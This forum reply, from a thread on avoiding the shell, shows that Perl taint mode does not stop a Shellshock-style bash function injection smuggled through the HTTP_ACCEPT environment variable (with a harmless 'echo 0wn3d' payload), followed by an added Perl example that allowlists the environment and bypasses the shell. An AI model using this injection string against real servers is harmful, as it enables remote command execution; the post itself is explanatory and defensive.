in reply to Re^2: The importance of avoiding the shell
in thread The importance of avoiding the shell

I'm pretty sure that is what he's saying, but he's wrong if that's the case.

    $ HTTP_ACCEPT='() { :;}; echo 0wn3d' \
      perl -T -e'$ENV{PATH}=""; system(q(/bin/ls -- "$HOME"))'
    0wn3d
    ... contents of home dir ...

While $ENV{HTTP_ACCEPT} is tainted, system doesn't check if it's tainted.
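An added example, not part of the original post: since taint mode leaves variables such as HTTP_ACCEPT in the child's environment, one mitigation is to hand the child an allowlisted environment and use the list form of system so no shell is started. The helper names clean_env and run_clean, the allowlist and its patterns are assumptions made for this sketch.

```perl
#!/usr/bin/perl
# Run as: perl -T thisfile.pl
use strict;
use warnings;

# Hypothetical allowlist: only these names reach the child, and only if the
# value matches the pattern. The capture group also untaints the value.
my %ALLOW = (
    HOME => qr{\A(/[\w./-]*)\z},
    LANG => qr{\A([\w.\@-]+)\z},
    TZ   => qr{\A([\w/+:-]+)\z},
);

# Build a fresh environment from an untrusted one. Anything not on the
# allowlist (HTTP_* headers set by a web server, for instance) is dropped.
sub clean_env {
    my (%in) = @_;
    my %out = (PATH => '/bin:/usr/bin');    # fixed, untainted PATH
    for my $name (keys %ALLOW) {
        next unless defined $in{$name};
        $out{$name} = $1 if $in{$name} =~ $ALLOW{$name};
    }
    return %out;
}

# Run a command with the given environment, bypassing the shell.
# The "system { PROGRAM } LIST" form always execs the program directly.
sub run_clean {
    my ($env, @cmd) = @_;
    local %ENV = %$env;                     # restored when the sub returns
    return system { $cmd[0] } @cmd;
}

# Constructed sample input: the header value from the post above.
$ENV{HTTP_ACCEPT} = '() { :;}; echo 0wn3d';

my %clean = clean_env(%ENV);
print "HTTP_ACCEPT passed to child: ",
      (exists $clean{HTTP_ACCEPT} ? "yes" : "no"), "\n";

if (defined $clean{HOME}) {
    my $status = run_clean(\%clean, '/bin/ls', '--', $clean{HOME});
    print "exit status: ", $status >> 8, "\n";
}
```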